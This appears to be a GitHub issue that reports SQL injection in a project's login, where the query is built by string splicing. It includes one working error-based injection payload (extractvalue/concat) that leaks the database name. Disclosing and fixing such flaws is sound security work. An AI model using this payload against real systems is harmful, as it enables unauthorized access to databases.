There is sql injection at the login

Build this project locally

There is a sql registration vulnerability in the login
![image](https://user-images.githubusercontent.com/46781023/218365611-a252e17b-4549-4f56-ad56-4f4ab2b83c44.png)
It is found that there is a splicing of sql statements at the verification login
![image](https://user-images.githubusercontent.com/46781023/218365647-b383df0f-22d1-4413-a33d-7ed523f3b487.png)
Vulnerability recurrence

Submit sql injection parameters

`user=zzu'/**/and/**/extractvalue(1,concat(0x7e,(select/**/database()),0x7e))#&password=admin`

![image](https://user-images.githubusercontent.com/46781023/218365809-590361ac-a2e1-4c6a-a5ac-c0de1f912048.png)





Provide feedback

Saved searches

Use saved searches to filter your results more quickly

There is sql injection at the login #6

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

There is sql injection at the login #6

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions